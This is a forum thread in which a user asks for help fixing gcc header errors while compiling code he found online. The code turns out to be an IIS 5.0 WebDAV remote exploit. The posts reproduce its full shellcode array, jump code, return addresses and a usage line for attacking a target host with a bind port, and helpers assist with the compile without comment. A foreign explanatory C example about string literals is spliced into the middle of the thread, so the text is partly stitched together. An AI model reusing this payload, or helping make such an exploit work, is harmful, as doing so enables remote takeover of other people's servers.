  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1727

"storage size of 'dst' isn't known" ??? any ideas?

I am trying to compile this program, and I keep getting this error:

$ gcc test.c
test.c:128:3: warning: multi-line string literals are deprecated
test.c: In function `main':
test.c:140: storage size of `dst' isn't known
test.c:145:18: warning: multi-line string literals are deprecated
test.c:172:27: warning: multi-line string literals are deprecated
test.c:183:27: warning: multi-line string literals are deprecated
test.c:244:34: warning: multi-line string literals are deprecated
test.c:262:10: warning: multi-line string literals are deprecated
test.c:275:16: warning: multi-line string literals are deprecated
test.c:278:12: warning: multi-line string literals are deprecated

Same if I use 'gcc test.c -o test.exe'

Any ideas?
0
Asked: MtM
1 Solution
 
grg99Commented:
Well, you seem to have something named "dst" that isn't declared before line 140.

You also have some multi-line literals, which often is a sign of some end-of-line problems.   Did you FTP this file from a DOS system or somesuch?


How about posting your code so we can see what's up?


0
 
MtMAuthor Commented:
What's your e-mail?  I can forward it to you.
0
 
 
MtMAuthor Commented:
I think the problem starts here:

int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

......
0
 
MtMAuthor Commented:
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

// Change to fit your need
#define  RET             0x4804          // EIP = 0x00480004
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034


// Don't change this
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
#define  MAXBUF          100000


/*
 * LoadLibraryA IT Address   := 0100107C
 * GetProcAddress IT Address := 01001034
 */

...... Skip down a little bit....

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
 * xor al, al
 * inc al
 * repnz scasb
 * jmp edi
 */

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\
n" \
  "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:search
request>\r\n";


/* Our code starts here */
int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

I got it off the web
0
 
MtMAuthor Commented:
*Note, that's not all of it... but I was hoping the problem is in there....
0
 
GaryFxCommented:
Do you have any relevant include lines?  On my system you need to #include <netinet/in.h> in order to get the definition of struct sockaddr_in.

Gary
0
 
MtMAuthor Commented:
What do you mean?  I did include netinet/in.h. That is not the whole program there.. and I cut some stuff out to save space... did I not declare dst right somewhere?
0
 
GaryFxCommented:
I posted my previous note before seeing your more extended posting.

Try getting rid of the backslash at the end of the first line of the definition of body (outside the double quote).

Gary
0
 
MtMAuthor Commented:
I get the same thing... :-/
0
 
MtMAuthor Commented:
bcopy(h->h_addr, &dst.sin_addr, h->h_length);
  dst.sin_family = AF_INET;
  dst.sin_port = htons(tport);
 
  // Socket creation
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
          perror("Failed to create socket");
          exit(-5);
        }
 
  // Connection
  if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1)

That is at the very bottom... and the only other part of the code that has 'dst' in it
0
 
honey_hamsterCommented:
For the 'deprecated' error, try making body[] into a single string, instead of 2 strings separated by the backslash, i.e. remove the " before the \, and remove the \, and remove the " that used to be right after the \.

And for dst, you might want to look at netinet\in.h and see the definition of struct sockaddr_in - maybe you need to set something up in order for the size of one of its fields to be known.  Feel free to post your compiler's definition of struct sockaddr_in - maybe somebody here can spot the problem.
0
 
GaryFxCommented:
What version of gcc are you using?  

Gary
0
 
sarda_rameshCommented:
hi there,

it seems that this is not a very big problem. You are expanding strings over two lines, don't do that, put it on a single line. E.g. if the string constant is like

"hello \
 world"

write it as "hello world"

in vi editor if the string is longer than the horizontal number of characters it will continue on the next line but if you see the line number (use :set nu) you will see that the two lines are actually one. Try using this.

regards
ramesh

0
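The three ways of wrapping a long string literal that the replies above describe (the backslash-newline inside the literal, adjacent literals, and the thread's body[] style with a backslash after the closing quote), as an added C example that is not code from the thread; the variable names and the sample text are constructed for illustration. It also shows the one behavioural difference worth knowing: a backslash-newline inside a literal keeps whatever indentation the continuation line carries, so `"hello \` followed by ` world"` is not byte-identical to `"hello world"`.

```c
#include <stdio.h>
#include <string.h>

/* Added example (constructed, not from the thread): the same text written
 * three ways. All three are valid C in every compiler; what differs is how
 * whitespace between the source lines is treated. */

/* Form 1: backslash-newline INSIDE the literal. The preprocessor splices the
 * two source lines into one before the string is tokenised, so any
 * indentation on the continuation line becomes part of the string. */
static const char spliced_no_indent[] = "hello \
world";

static const char spliced_indented[] = "hello \
 world";   /* continuation line starts with one space: "hello  world" */

/* Form 2: adjacent string literals. They are concatenated after
 * preprocessing; the newline and indentation between them are ordinary
 * whitespace and never reach the string. This is the portable way to wrap. */
static const char adjacent[] = "hello "
                               "world";

/* Form 3: the thread's body[] style, a backslash AFTER the closing quote.
 * The splice joins the source lines, then the two literals are adjacent and
 * are concatenated, so the result equals form 2. */
static const char adjacent_with_splice[] = "hello " \
    "world";

/* A raw newline inside a literal (what gcc 3.x warned about as a deprecated
 * multi-line string literal) is not written here because current compilers
 * reject it outright; the three forms above are the accepted spellings. */

/* Helpers so the results can be checked rather than only printed. */
size_t len_spliced_no_indent(void)   { return strlen(spliced_no_indent); }   /* 11 */
size_t len_spliced_indented(void)    { return strlen(spliced_indented); }    /* 12 */
size_t len_adjacent(void)            { return strlen(adjacent); }            /* 11 */
size_t len_adjacent_with_splice(void){ return strlen(adjacent_with_splice); } /* 11 */

/* 1 when forms 1 (unindented), 2 and 3 produce the identical byte string. */
int forms_agree(void)
{
    return strcmp(spliced_no_indent, adjacent) == 0
        && strcmp(adjacent_with_splice, adjacent) == 0;
}

int main(void)
{
    printf("spliced, no indent : \"%s\" (%zu)\n", spliced_no_indent, len_spliced_no_indent());
    printf("spliced, indented  : \"%s\" (%zu)\n", spliced_indented, len_spliced_indented());
    printf("adjacent           : \"%s\" (%zu)\n", adjacent, len_adjacent());
    printf("adjacent + splice  : \"%s\" (%zu)\n", adjacent_with_splice, len_adjacent_with_splice());
    return forms_agree() ? 0 : 1;
}
```

Compile with `gcc -Wall example.c && ./a.out`; the indented spliced form is the only one that comes out a byte longer, which is why form 2 (adjacent literals, no backslash) is the safest way to split a long request body such as body[] across lines.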
 
MtMAuthor Commented:
I am using cygwin to emulate unix, and then moved over
minGW for gcc... (DOWNLOADED it yesterday, so newest I guess) and I'm actually not sure of the version.  I have two if.h's, the first includes the other... Here are both of them:


/* netinet/in.h

   Copyright 1998, 2001 Red Hat, Inc.

This file is part of Cygwin.

This software is a copyrighted work licensed under the terms of the
Cygwin license.  Please consult the file "CYGWIN_LICENSE" for
details. */

#ifndef _NETINET_IN_H
#define _NETINET_IN_H

#include <cygwin/in.h>

#endif /* _NETINET_IN_H */


THERES THE NEXT ONE:


/* cygwin/if.h

   Copyright 1996, 2001 Red Hat, Inc.

This file is part of Cygwin.

This software is a copyrighted work licensed under the terms of the
Cygwin license.  Please consult the file "CYGWIN_LICENSE" for
details. */

#ifndef _CYGWIN_IF_H_
#define _CYGWIN_IF_H_

#ifdef __cplusplus
extern "C" {
#endif /* __cplusplus */

#include <sys/types.h>
#include <sys/socket.h>

/* Standard interface flags. */
#define IFF_UP          0x1             /* interface is up              */
#define IFF_BROADCAST   0x2             /* broadcast address valid      */
#define IFF_LOOPBACK    0x8             /* is a loopback net            */
#define IFF_NOTRAILERS  0x20            /* avoid use of trailers        */
#define IFF_RUNNING     0x40            /* resources allocated          */
#define IFF_PROMISC     0x100           /* receive all packets          */
#define IFF_MULTICAST   0x1000          /* Supports multicast           */

/*
 * Interface request structure used for socket
 * ioctl's.  All interface ioctl's must have parameter
 * definitions which begin with ifr_name.  The
 * remainder may be interface specific.
 */

struct ifreq
{
#define IFNAMSIZ        16
#define IFHWADDRLEN     6
     union
     {
          char    ifrn_name[IFNAMSIZ];            /* if name, e.g. "en0" */
     } ifr_ifrn;

     union {
          struct  sockaddr ifru_addr;
          struct  sockaddr ifru_broadaddr;
          struct  sockaddr ifru_netmask;
          struct  sockaddr ifru_hwaddr;
          short   ifru_flags;
          int     ifru_metric;
          int     ifru_mtu;
     } ifr_ifru;
};

#define ifr_name        ifr_ifrn.ifrn_name      /* interface name       */
#define ifr_addr        ifr_ifru.ifru_addr      /* address              */
#define ifr_broadaddr   ifr_ifru.ifru_broadaddr /* broadcast address    */
#define ifr_netmask     ifr_ifru.ifru_netmask   /* interface net mask   */
#define ifr_flags       ifr_ifru.ifru_flags     /* flags                */
#define ifr_hwaddr      ifr_ifru.ifru_hwaddr    /* MAC address          */
#define ifr_metric      ifr_ifru.ifru_metric    /* metric               */
#define ifr_mtu         ifr_ifru.ifru_mtu       /* mtu                  */


/*
 * Structure used in SIOCGIFCONF request.
 * Used to retrieve interface configuration
 * for machine (useful for programs which
 * must know all networks accessible).
 */

struct ifconf
{
     int     ifc_len;                        /* size of buffer       */
     union
     {
          caddr_t ifcu_buf;
          struct  ifreq *ifcu_req;
     } ifc_ifcu;
};
#define ifc_buf ifc_ifcu.ifcu_buf               /* buffer address       */
#define ifc_req ifc_ifcu.ifcu_req               /* array of structures  */

#ifdef __cplusplus
};
#endif /* __cplusplus */

#endif /* _CYGWIN_IF_H_ */
0
 
MtMAuthor Commented:
test1.c: In function `main':
test1.c:138: storage size of `dst' isn't known

That is the only error I'm getting now... took care of all those warnings.  I'm so close :-/
0
 
honey_hamsterCommented:
You posted cygwin/if.h, not cygwin/in.h - can you post your in.h?
0
 
MtMAuthor Commented:
My problem before was that I had two of the same in.h in both those folders... So one of them was just including the same file again.  Now that I have it including the right in.h with the actual information about all the tcpip stuff it needs... I get this error:

In File included from c:/cygwin/lib/gcc-lib/mingw32/3.2/include/netinet/in.h:14,from test1.c:8:

c:/cygwin/lib/gcc-lib/mingw32/3.2/include/cygwin/in.h:40: parse error before "in_port_t:

c:/cygwin.lib/gcc-lib/wingw32/include/cygwin/in.h:81: parse error before :in_addr_t:

Thanks for your help again
0
 
MtMAuthor Commented:

typedef uint16_t in_port_t;
/* Standard well-known ports.  *//* from winsup/include/netinet/in.h */
enum
{


Looks like that's the line it's having problems with
0
 
MtMAuthor Commented:
Oops.. sorry, here's the in.h

/*
 * INET            An implementation of the TCP/IP protocol suite for the LINUX
 *            operating system.  INET is implemented using the  BSD Socket
 *            interface as the means of communication with the user level.
 *
 *            Definitions of the Internet Protocol.
 *
 * Version:      @(#)in.h      1.0.1      04/21/93
 *
 * Authors:      Original taken from the GNU Project <netinet/in.h> file.
 *            Fred N. van Kempen, <waltje@uWalt.NL.Mugnet.ORG>
 *
 *            This program is free software; you can redistribute it and/or
 *            modify it under the terms of the GNU General Public License
 *            as published by the Free Software Foundation; either version
 *            2 of the License, or (at your option) any later version.
 */
#ifndef _CYGWIN_IN_H
#define _CYGWIN_IN_H

#include <cygwin/types.h>

/* Standard well-defined IP protocols.  */
enum
{
  IPPROTO_IP = 0,            /* Dummy protocol for TCP            */
  IPPROTO_ICMP = 1,            /* Internet Control Message Protocol      */
  IPPROTO_IGMP = 2,            /* Internet Gateway Management Protocol */
  IPPROTO_IPIP = 4,            /* IPIP tunnels (older KA9Q tunnels use 94) */
  IPPROTO_TCP = 6,            /* Transmission Control Protocol      */
  IPPROTO_EGP = 8,            /* Exterior Gateway Protocol            */
  IPPROTO_PUP = 12,            /* PUP protocol                        */
  IPPROTO_UDP = 17,            /* User Datagram Protocol            */
  IPPROTO_IDP = 22,            /* XNS IDP protocol                  */

  IPPROTO_RAW = 255,            /* Raw IP packets                  */
  IPPROTO_MAX
};

typedef uint16_t in_port_t;
/* Standard well-known ports.  *//* from winsup/include/netinet/in.h */
enum
{
  IPPORT_ECHO = 7,            /* Echo service.  */
  IPPORT_DISCARD = 9,            /* Discard transmissions service.  */
  IPPORT_SYSTAT = 11,            /* System status service.  */
  IPPORT_DAYTIME = 13,      /* Time of day service.  */
  IPPORT_NETSTAT = 15,      /* Network status service.  */
  IPPORT_FTP = 21,            /* File Transfer Protocol.  */
  IPPORT_TELNET = 23,            /* Telnet protocol.  */
  IPPORT_SMTP = 25,            /* Simple Mail Transfer Protocol.  */
  IPPORT_TIMESERVER = 37,      /* Timeserver service.  */
  IPPORT_NAMESERVER = 42,      /* Domain Name Service.  */
  IPPORT_WHOIS = 43,            /* Internet Whois service.  */
  IPPORT_MTP = 57,

  IPPORT_TFTP = 69,            /* Trivial File Transfer Protocol.  */
  IPPORT_RJE = 77,
  IPPORT_FINGER = 79,            /* Finger service.  */
  IPPORT_TTYLINK = 87,
  IPPORT_SUPDUP = 95,            /* SUPDUP protocol.  */


  IPPORT_EXECSERVER = 512,      /* execd service.  */
  IPPORT_LOGINSERVER = 513,      /* rlogind service.  */
  IPPORT_CMDSERVER = 514,
  IPPORT_EFSSERVER = 520,

  /* UDP ports.  */
  IPPORT_BIFFUDP = 512,
  IPPORT_WHOSERVER = 513,
  IPPORT_ROUTESERVER = 520,

  /* Ports less than this value are reserved for privileged processes.  */
  IPPORT_RESERVED = 1024,

  /* Ports greater this value are reserved for (non-privileged) servers.  */
  IPPORT_USERRESERVED = 5000
};

typedef uint32_t in_addr_t;
/* Internet address. */
struct in_addr
{
  unsigned int s_addr;
};

/* Request struct for multicast socket ops */

struct ip_mreq
{
  struct in_addr imr_multiaddr;      /* IP multicast address of group */
  struct in_addr imr_interface;      /* local IP address of interface */
};


/* Structure describing an Internet (IP) socket address. */
#define __SOCK_SIZE__      16            /* sizeof(struct sockaddr)      */
struct sockaddr_in
{
  short int sin_family;      /* Address family            */
  unsigned short int sin_port;      /* Port number                  */
  struct in_addr sin_addr;      /* Internet address            */

  /* Pad to size of `struct sockaddr'. */
  unsigned char  __pad[__SOCK_SIZE__ - sizeof(short int)
                  - sizeof(unsigned short int) - sizeof(struct in_addr)];
};
#define sin_zero      __pad            /* for BSD UNIX comp. -FvK      */

/*
 * Definitions of the bits in an Internet address integer.
 * On subnets, host and network parts are found according
 * to the subnet mask, not these masks.
 */
#define      IN_CLASSA(a)            ((((long int) (a)) & 0x80000000) == 0)
#define      IN_CLASSA_NET            0xff000000
#define      IN_CLASSA_NSHIFT      24
#define      IN_CLASSA_HOST            (0xffffffff & ~IN_CLASSA_NET)
#define      IN_CLASSA_MAX            128

#define      IN_CLASSB(a)            ((((long int) (a)) & 0xc0000000) == 0x80000000)
#define      IN_CLASSB_NET            0xffff0000
#define      IN_CLASSB_NSHIFT      16
#define      IN_CLASSB_HOST            (0xffffffff & ~IN_CLASSB_NET)
#define      IN_CLASSB_MAX            65536

#define      IN_CLASSC(a)            ((((long int) (a)) & 0xe0000000) == 0xc0000000)
#define      IN_CLASSC_NET            0xffffff00
#define      IN_CLASSC_NSHIFT      8
#define      IN_CLASSC_HOST            (0xffffffff & ~IN_CLASSC_NET)

#define      IN_CLASSD(a)            ((((long int) (a)) & 0xf0000000) == 0xe0000000)
#define      IN_MULTICAST(a)            IN_CLASSD(a)
#define IN_MULTICAST_NET      0xF0000000

#define      IN_EXPERIMENTAL(a)      ((((long int) (a)) & 0xe0000000) == 0xe0000000)
#define      IN_BADCLASS(a)            ((((long int) (a)) & 0xf0000000) == 0xf0000000)

/* Address to accept any incoming messages. */
#define      INADDR_ANY            ((unsigned long int) 0x00000000)

/* Address to send to all hosts. */
#define      INADDR_BROADCAST      ((unsigned long int) 0xffffffff)

/* Address indicating an error return. */
#define      INADDR_NONE            0xffffffff

/* Network number for local host loopback. */
#define      IN_LOOPBACKNET            127

/* Address to loopback in software to local host.  */
#define      INADDR_LOOPBACK            0x7f000001      /* 127.0.0.1   */
#define      IN_LOOPBACK(a)            ((((long int) (a)) & 0xff000000) == 0x7f000000)

/* Defines for Multicast INADDR */
#define INADDR_UNSPEC_GROUP      0xe0000000      /* 224.0.0.0   */
#define INADDR_ALLHOSTS_GROUP      0xe0000001      /* 224.0.0.1   */
#define INADDR_MAX_LOCAL_GROUP  0xe00000ff      /* 224.0.0.255 */

/* <asm/byteorder.h> contains the htonl type stuff.. */

#include <asm/byteorder.h>

/* Some random defines to make it easier in the kernel.. */
#ifdef __KERNEL__

#define LOOPBACK(x)      (((x) & htonl(0xff000000)) == htonl(0x7f000000))
#define MULTICAST(x)      (((x) & htonl(0xf0000000)) == htonl(0xe0000000))

#endif

/* IPv6 definitions as we start to include them. This is just
   a beginning dont get excited 8) */
struct in6_addr
{
  unsigned char s6_addr[16];
};

struct sockaddr_in6
{
  unsigned short sin6_family;
  unsigned short sin6_port;
  unsigned long sin6_flowinfo;
  struct in6_addr sin6_addr;
};
#endif      /* _CYGWIN_IN_H */
0
 
MtMAuthor Commented:
I also just realized that I moved on sys/types.h into both my cygwin dir because I was getting "conflicting types for 'ino_t'".  When I put them back to default, with the in.h also at default, the error reads like this:

In file included from c:/cygwin/lib/gcc-lib/wingw32/3.2/include/cygwin/in.h:21,
from c:/cygwin/lib/gcc-lb/wingw32/3.2/include/netinet/in.h:14, from test1.c:8:
c:/cygwin/lib/gcc-lib/wingw32/3.2/include/cygwin/types.h:98: conflicting types for 'ino_t'
c:/cygwin/lib/gcc-lib/wingw32/3.2/include/sys/types.h:121: previous declaration of 'ino_t'
0
 
honey_hamsterCommented:
I think the problem is that the compiler doesn't know what uint32_t and uint16_t are.  At the top of in.h, there is an include of cygwin/types.h.  You might want to check to see whether uintxx_t are typedef'ed in there.  If they are, there might be an #ifndef that's preventing them from being seen by the compiler.  If you can't figure out why uintxx_t aren't being defined, then as an ugly hack, you can add the following 2 lines to your source file before including in.h:
/* typedef takes the existing type first and the new name second */
typedef unsigned long uint32_t;
typedef unsigned short uint16_t;
0
 
honey_hamsterCommented:
Sorry, I posted before your final post.  It's not ideal to have 2 different 'types.h' being included by the same .c file.  It's even more dangerous if different .c files include DIFFERENT 'types.h'.  One thing you could try is ensure that the 2 different types.h are identical.  Temporarily rename sys\types.h sys\types.h.old and then copy cygwin\types.h sys\types.h.
0
 
MtMAuthor Commented:
I'm sure it's my inexperience, and the fact that I'm using cygwin with minGW, but I can't figure this out.  There is the whole program I'm trying to compile, maybe someone with a real linux/unix compiler can actually compile it.  Then maybe I will know what's up.

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

 
// Change to fit your need
#define  RET             0x4804          // EIP = 0x00480004
#define  LOADLIBRARYA    0x0100107c
#define  GETPROCADDRESS  0x01001034


// Don't change this
#define  PORT_OFFSET     1052
#define  LOADL_OFFSET    798
#define  GETPROC_OFFSET  815
#define  NOP             0x90
#define  MAXBUF          100000


/*
 * LoadLibraryA IT Address   := 0100107C
 * GetProcAddress IT Address := 01001034
 */

unsigned char shellcode[] =            // Deepzone shellcode
  "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
  "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
  "\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
  "\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
  "\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
  "\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
  "\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
  "\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
  "\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
  "\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
  "\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
  "\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
  "\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
  "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
  "\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
  "\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
  "\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
  "\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
  "\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
  "\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
  "\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
  "\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
  "\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
  "\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
  "\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
  "\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
  "\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
  "\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
  "\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
  "\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
  "\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
  "\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
  "\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
  "\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
  "\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
  "\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
  "\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
  "\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
  "\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
  "\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
  "\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
  "\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
  "\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
  "\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
  "\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
  "\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
  "\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
  "\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
  "\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
  "\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
  "\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
  "\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
  "\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
  "\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
  "\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
  "\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
  "\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
  "\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
  "\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
  "\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
  "\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
  "\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
  "\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
  "\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
  "\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
  "\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
  "\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
  "\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
  "\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
  "\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
  "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
  "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* mov edi, ecx
 * xor al, al
 * inc al
 * repnz scasb
 * jmp edi
 */

char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
  "<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";


/* Our code starts here */
int main (int argc, char **argv)
{
 
  unsigned long ret;
  unsigned short port;
  int tport, bport, s, i, j, r, rt=0;
  struct hostent *h;
  struct sockaddr_in dst;
  char buffer[MAXBUF];

  if (argc < 2 || argc > 5)
        {
          printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt <roman@rs-labs.com>. 23/03/2003\nUsage: %s <target host> [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET);
          exit(-1);
        }
 
  // Default target port = 80
  if (argc > 2)
        tport = atoi(argv[2]);
  else
        tport = 80;

  // Default bind port = 31337
  if (argc > 3)
        bport = atoi(argv[3]);
  else
        bport = 31337;

  // Default ret value = RET
  if (argc > 4)
        ret = strtoul(argv[4], NULL, 16);
  else
        ret = RET;

  if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 )
        {
          fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n");
          exit(-2);
        }
   
